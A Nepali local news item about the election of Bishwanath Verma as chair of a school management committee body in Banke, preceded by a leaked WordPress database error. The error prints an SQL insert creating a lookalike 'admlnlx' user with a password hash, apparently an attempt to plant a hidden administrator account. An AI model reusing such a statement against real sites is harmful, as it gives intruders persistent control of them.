WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfiRjwkwf9FQmCp0lJA2atuGd09ADd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 06:11:58', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस १३-
नेपाल राष्ट्रिय आधारभूत विद्यालय व्यवस्थापन समित बांकेको अध्यक्षमा विश्वनाथ वर्मा निर्वाचित हुनुभएको छ ।उहांले निकटतम प्रतिद्धन्द्धी लक्ष्मीनारायण वर्मालाई २ मतले पछाडी पार्दै विजयी हुनुभएको हो । ८ प्रतिनिधि मत मध्य विश्वनाथले ५ र लक्ष्मीनारायणले ३ मत प्राप्त गर्नुभएको थियो ।
विश्वनाथलाई एमालेको समर्थन थियो भने लक्ष्मीनारायण काग्रेंसको समर्थनमा अध्यक्षमा दावी गर्नुभएको थियो ।३ वर्षे कार्यकालका लागी भएको अधिवेशनवाट अन्जनी मिश्र,कुन्ती हरिजन,फुलमती सोनखर,जायवन्त श्रीवास्तव सदस्यमा चयन हुनुभएको छ । त्यस्तै असीन अन्सारी शिक्षक प्रतिनिधी र सदस्य सचिव खेम लाल वनवोल चयन हुनुभएको छ ।